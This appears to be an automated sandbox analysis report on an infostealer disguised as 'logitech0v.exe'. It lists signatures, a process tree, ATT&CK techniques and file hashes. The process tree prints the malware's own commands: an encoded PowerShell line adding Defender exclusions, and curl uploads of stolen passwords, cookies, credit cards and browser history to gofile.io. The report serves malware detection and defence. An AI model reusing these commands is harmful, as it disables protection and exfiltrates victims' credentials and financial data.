Analysis

  • max time kernel
    57s
  • max time network
    52s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-07-2024 04:05

General

  • Target

    https://coinchatdaily.com/logitech0v.exe

Malware Config

Signatures

  • Downloads MZ/PE file
  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 49 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://coinchatdaily.com/logitech0v.exe
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4520
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff0e6e9758,0x7fff0e6e9768,0x7fff0e6e9778
      2⤵
        PID:212
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:2
        2⤵
          PID:2964
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1808 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
          2⤵
            PID:2940
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2116 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
            2⤵
              PID:820
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:1
              2⤵
                PID:4452
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2844 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:1
                2⤵
                  PID:4884
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                  2⤵
                    PID:5012
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4940 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                    2⤵
                      PID:3920
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5128 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                      2⤵
                        PID:4504
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                        2⤵
                          PID:3008
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4376 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                          2⤵
                            PID:1056
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5388 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                            2⤵
                              PID:4908
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5044 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                              2⤵
                                PID:2292
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                                2⤵
                                  PID:3008
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3804 --field-trial-handle=1832,i,6815124624638536594,17071987264396165842,131072 /prefetch:8
                                  2⤵
                                    PID:1056
                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                  1⤵
                                    PID:4600
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:4736
                                    • C:\Users\Admin\Downloads\logitech0v.exe
                                      "C:\Users\Admin\Downloads\logitech0v.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:1676
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAdQBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAcQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdwBqACMAPgA="
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4760
                                      • C:\Users\Admin\AppData\Local\Temp\logitech0v.exe
                                        "C:\Users\Admin\AppData\Local\Temp\logitech0v.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4744
                                        • C:\Users\Admin\AppData\Local\Temp\logitech0v.exe
                                          "C:\Users\Admin\AppData\Local\Temp\logitech0v.exe"
                                          3⤵
                                          • Drops startup file
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:600
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"
                                            4⤵
                                              PID:4956
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"
                                              4⤵
                                                PID:2272
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"
                                                4⤵
                                                  PID:4224
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"
                                                  4⤵
                                                    PID:1264
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile"
                                                    4⤵
                                                      PID:2684
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        5⤵
                                                          PID:4956
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile"
                                                        4⤵
                                                          PID:1996
                                                  • C:\Users\Admin\Downloads\logitech0v.exe
                                                    "C:\Users\Admin\Downloads\logitech0v.exe"
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:1328
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAdQBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAcQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdwBqACMAPgA="
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3892
                                                    • C:\Users\Admin\AppData\Local\Temp\logitech0v.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\logitech0v.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2648
                                                      • C:\Users\Admin\AppData\Local\Temp\logitech0v.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\logitech0v.exe"
                                                        3⤵
                                                        • Drops startup file
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:3320
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store3.gofile.io/uploadFile"
                                                          4⤵
                                                            PID:2468
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store3.gofile.io/uploadFile"
                                                            4⤵
                                                              PID:2456
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store3.gofile.io/uploadFile"
                                                              4⤵
                                                                PID:512
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store3.gofile.io/uploadFile"
                                                                4⤵
                                                                  PID:1328
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store3.gofile.io/uploadFile"
                                                                  4⤵
                                                                    PID:3512
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store3.gofile.io/uploadFile"
                                                                    4⤵
                                                                      PID:1052

                                                              Network

                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                              Execution

                                                              Command and Scripting Interpreter

                                                              1
                                                              T1059

                                                              PowerShell

                                                              1
                                                              T1059.001

                                                              Credential Access

                                                              Unsecured Credentials

                                                              2
                                                              T1552

                                                              Credentials In Files

                                                              2
                                                              T1552.001

                                                              Discovery

                                                              System Information Discovery

                                                              2
                                                              T1082

                                                              Query Registry

                                                              1
                                                              T1012

                                                              Collection

                                                              Data from Local System

                                                              2
                                                              T1005

                                                              Command and Control

                                                              Web Service

                                                              1
                                                              T1102

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                Filesize

                                                                6KB

                                                                MD5

                                                                fdc323f6b1d2ad06074c9a982144d7ea

                                                                SHA1

                                                                9b6bae1f71abb3131697d7f4a8e24df930c31182

                                                                SHA256

                                                                c7a29ab0111f1bfb9c3054c6b0340be2a49fa38fba563280045be0525b0a94b7

                                                                SHA512

                                                                71822f60a5147db9548315b178bd47884a818fb5a4414c74f7dc3553f668bafe7b759a7bcf42f0aec254592a7a119088801934da856c79a913d823bc58acefd6

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                Filesize

                                                                137KB

                                                                MD5

                                                                00a0040b3a9f68c9ac3290fea4c7ef05

                                                                SHA1

                                                                3a19db8b1737b68eabe4cb5b6d650ae8100462b5

                                                                SHA256

                                                                26780d84d466d8ef3efb7f56daaf755ebce4501e9cc9fa039444637252196851

                                                                SHA512

                                                                595b1eb2e9fb7af37f9e6408d337e67e70b6db8c827fdea4eaaba9000a89e101c60602d10c3f15f0e576f975cfc43e556b9cb2aea1c5bf032958f9bbbeb0b3de

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                Filesize

                                                                138KB

                                                                MD5

                                                                73181591379ed400bf5879e72f50cf4f

                                                                SHA1

                                                                3626b431507e4b7dd67ed205745fade3a498fa71

                                                                SHA256

                                                                2e55d321720ebdc01e6191f346926ec31f0c2daf1ad66c8c60002c00987fc38f

                                                                SHA512

                                                                26ca1ed49c2169a2713765e6ab395703015c89af3754807585610913991ce3f83ab90dc0a35fd00391750dc8adfd12a6277d9730a6c544d22241a5eb4e7d1f77

                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
                                                                Filesize

                                                                2B

                                                                MD5

                                                                99914b932bd37a50b983c5e7c90ae93b

                                                                SHA1

                                                                bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                SHA256

                                                                44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                SHA512

                                                                27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\Crypto\Cipher\_raw_cbc.pyd
                                                                Filesize

                                                                12KB

                                                                MD5

                                                                20708935fdd89b3eddeea27d4d0ea52a

                                                                SHA1

                                                                85a9fe2c7c5d97fd02b47327e431d88a1dc865f7

                                                                SHA256

                                                                11dd1b49f70db23617e84e08e709d4a9c86759d911a24ebddfb91c414cc7f375

                                                                SHA512

                                                                f28c31b425dc38b5e9ad87b95e8071997e4a6f444608e57867016178cd0ca3e9f73a4b7f2a0a704e45f75b7dcff54490510c6bf8461f3261f676e9294506d09b

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\Crypto\Cipher\_raw_ofb.pyd
                                                                Filesize

                                                                12KB

                                                                MD5

                                                                4d9182783ef19411ebd9f1f864a2ef2f

                                                                SHA1

                                                                ddc9f878b88e7b51b5f68a3f99a0857e362b0361

                                                                SHA256

                                                                c9f4c5ffcdd4f8814f8c07ce532a164ab699ae8cde737df02d6ecd7b5dd52dbd

                                                                SHA512

                                                                8f983984f0594c2cac447e9d75b86d6ec08ed1c789958afa835b0d1239fd4d7ebe16408d080e7fce17c379954609a93fc730b11be6f4a024e7d13d042b27f185

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\_ctypes.pyd
                                                                Filesize

                                                                120KB

                                                                MD5

                                                                22c4892caf560a3ee28cf7f210711f9e

                                                                SHA1

                                                                b30520fadd882b667ecef3b4e5c05dc92e08b95a

                                                                SHA256

                                                                e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c

                                                                SHA512

                                                                edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\_decimal.pyd
                                                                Filesize

                                                                247KB

                                                                MD5

                                                                baaa9067639597e63b55794a757ddeff

                                                                SHA1

                                                                e8dd6b03ebef0b0a709e6cccff0e9f33c5142304

                                                                SHA256

                                                                6cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72

                                                                SHA512

                                                                7995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\_lzma.pyd
                                                                Filesize

                                                                155KB

                                                                MD5

                                                                d386b7c4dcf589e026abfc7196cf1c4c

                                                                SHA1

                                                                c07ce47ce0e69d233c5bdd0bcac507057d04b2d4

                                                                SHA256

                                                                ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1

                                                                SHA512

                                                                78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\_sqlite3.pyd
                                                                Filesize

                                                                117KB

                                                                MD5

                                                                a70731ae2ca44b7292623ae8b0281549

                                                                SHA1

                                                                9e086c0753bb43e2876c33c4872e71808932a744

                                                                SHA256

                                                                55344349f9199aedad1737a0311cbe2c3a4bf9494b76982520bacad90f463c1b

                                                                SHA512

                                                                8334104df9837d32946965290bbc46ba0a0ada17bd2d03fc63380979f5fc86b26be245636718b4304dfd0d85a5b3f7170614f148e5c965cc5adf59d34465f7f1

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\base_library.zip
                                                                Filesize

                                                                1.4MB

                                                                MD5

                                                                d220b7e359810266fe6885a169448fa0

                                                                SHA1

                                                                556728b326318b992b0def059eca239eb14ba198

                                                                SHA256

                                                                ca40732f885379489d75a2dec8eb68a7cce024f7302dd86d63f075e2745a1e7d

                                                                SHA512

                                                                8f802c2e717b0cb47c3eeea990ffa0214f17d00c79ce65a0c0824a4f095bde9a3d9d85efb38f8f2535e703476cb6f379195565761a0b1d738d045d7bb2c0b542

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\certifi\cacert.pem
                                                                Filesize

                                                                287KB

                                                                MD5

                                                                2a6bef11d1f4672f86d3321b38f81220

                                                                SHA1

                                                                b4146c66e7e24312882d33b16b2ee140cb764b0e

                                                                SHA256

                                                                1605d0d39c5e25d67e7838da6a17dcf2e8c6cfa79030e8fb0318e35f5495493c

                                                                SHA512

                                                                500dfff929d803b0121796e8c1a30bdfcb149318a4a4de460451e093e4cbd568cd12ab20d0294e0bfa7efbd001de968cca4c61072218441d4fa7fd9edf7236d9

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\python311.dll
                                                                Filesize

                                                                5.5MB

                                                                MD5

                                                                65e381a0b1bc05f71c139b0c7a5b8eb2

                                                                SHA1

                                                                7c4a3adf21ebcee5405288fc81fc4be75019d472

                                                                SHA256

                                                                53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a

                                                                SHA512

                                                                4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\sqlite3.dll
                                                                Filesize

                                                                1.4MB

                                                                MD5

                                                                256224cc25d085663d4954be6cc8c5b5

                                                                SHA1

                                                                9931cc156642e2259dfabf0154fddf50d86e9334

                                                                SHA256

                                                                5ac6ee18cdca84c078b66055f5e9ffc6f8502e22eaf0fa54aeec92b75a3c463e

                                                                SHA512

                                                                a28abf03199f0ce9f044329f7eba2f1d8ecbc43674337aafbf173f567158ba9046036da91dc3e12c2bb1d7842953526edba14bc03f81ece63dcedcc9413213a7

                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47442\unicodedata.pyd
                                                                Filesize

                                                                1.1MB

                                                                MD5

                                                                57f8f40cf955561a5044ddffa4f2e144

                                                                SHA1

                                                                19218025bcae076529e49dde8c74f12e1b779279

                                                                SHA256

                                                                1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560

                                                                SHA512

                                                                db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gsslwnrm.ptx.ps1
                                                                Filesize

                                                                1B

                                                                MD5

                                                                c4ca4238a0b923820dcc509a6f75849b

                                                                SHA1

                                                                356a192b7913b04c54574d18c28d46e6395428ab

                                                                SHA256

                                                                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                SHA512

                                                                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                              • C:\Users\Admin\AppData\Local\Temp\logitech0v.exe
                                                                Filesize

                                                                9.9MB

                                                                MD5

                                                                5172c1598de4072efe8641dd7e035910

                                                                SHA1

                                                                cdeb61ea4ca96228c712cc3bfbe2fc087ec92504

                                                                SHA256

                                                                1fb73f75a8b7f71a92f2de6dceb89b0a79e4fbadadacb6a96ad271a823614683

                                                                SHA512

                                                                04f69de1b6c66af46fbdb13847f524a6f35c614ae78455fc671d346259fd1b556346ac6e34c048af00586031b4bdec36595787ceb41736e4a74afcff9b60dffc

                                                              • C:\Users\Admin\AppData\Local\Tempcshmfsqbqt.db
                                                                Filesize

                                                                92KB

                                                                MD5

                                                                f0764eecc2d52e7c433725edd7f6e17a

                                                                SHA1

                                                                2b6c1165e7ca5c433b29db548ac2624037c8cb38

                                                                SHA256

                                                                6764736d2bd111036bea0eeb890cd75a5bb4114275abfffe615d9f79049f0ffc

                                                                SHA512

                                                                3cb2f0abc6925907488de7ecef46d60106efb98cec3c63e24e531bbf94dcd8c89ad57e0a88084eaa5083265f32134e6636f23808622db5cb3f5c83faaba96ef0

                                                              • C:\Users\Admin\AppData\Local\Tempcskeehgszd.db
                                                                Filesize

                                                                46KB

                                                                MD5

                                                                02d2c46697e3714e49f46b680b9a6b83

                                                                SHA1

                                                                84f98b56d49f01e9b6b76a4e21accf64fd319140

                                                                SHA256

                                                                522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                                                SHA512

                                                                60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                                              • C:\Users\Admin\AppData\Local\Tempcsmkxoqwxo.db
                                                                Filesize

                                                                148KB

                                                                MD5

                                                                f89fe86d5a83bc6df385fa966899fd86

                                                                SHA1

                                                                d66187ed40029a462277fb82abb190cc331c3fc4

                                                                SHA256

                                                                20d51dbeaa4c27e2d0375cc6dcc40c4525fa482fb548507a416a7151cfb8dba3

                                                                SHA512

                                                                6698bcb8109c76477449ea5e675bb019f39a373d6218e3b491235be111cf9bc9e690b14a32a439eeb6605c214d05cad4d9b98c189203060ce747b92fb7147670

                                                              • C:\Users\Admin\AppData\Local\Tempcsrydlkfcw.db
                                                                Filesize

                                                                20KB

                                                                MD5

                                                                c9ff7748d8fcef4cf84a5501e996a641

                                                                SHA1

                                                                02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

                                                                SHA256

                                                                4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

                                                                SHA512

                                                                d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

                                                              • C:\Users\Admin\Downloads\Unconfirmed 818045.crdownload
                                                                Filesize

                                                                9.9MB

                                                                MD5

                                                                85d02255c99f4c91b2683ee50f739099

                                                                SHA1

                                                                4138f81d90c76c5bf44aba7b80012016bfa7ec14

                                                                SHA256

                                                                fab455ba419867e3dfbe7a9fc838d3fb07b564c1db581a3e0e7e32a5df084a0b

                                                                SHA512

                                                                01178aa2ab7c2e424f8489f8f3492d0ffe9d8233023f0c0c467b26ed7eebc749f6727b88c5e22772a72a30892497d3ad960cdaac2b223f324a18da77b7b29d80

                                                              • \??\pipe\crashpad_4520_TWTXXNSKZIBXDOVS
                                                                MD5

                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                SHA1

                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                SHA256

                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                SHA512

                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                              • \Users\Admin\AppData\Local\Temp\_MEI47442\Crypto\Cipher\_raw_cfb.pyd
                                                                Filesize

                                                                13KB

                                                                MD5

                                                                43bbe5d04460bd5847000804234321a6

                                                                SHA1

                                                                3cae8c4982bbd73af26eb8c6413671425828dbb7

                                                                SHA256

                                                                faa41385d0db8d4ee2ee74ee540bc879cf2e884bee87655ff3c89c8c517eed45

                                                                SHA512

                                                                dbc60f1d11d63bebbab3c742fb827efbde6dff3c563ae1703892d5643d5906751db3815b97cbfb7da5fcd306017e4a1cdcc0cdd0e61adf20e0816f9c88fe2c9b

                                                              • \Users\Admin\AppData\Local\Temp\_MEI47442\Crypto\Cipher\_raw_ecb.pyd
                                                                Filesize

                                                                10KB

                                                                MD5

                                                                fee13d4fb947835dbb62aca7eaff44ef

                                                                SHA1

                                                                7cc088ab68f90c563d1fe22d5e3c3f9e414efc04

                                                                SHA256

                                                                3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543

                                                                SHA512

                                                                dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2

                                                              • \Users\Admin\AppData\Local\Temp\_MEI47442\VCRUNTIME140.dll
                                                                Filesize
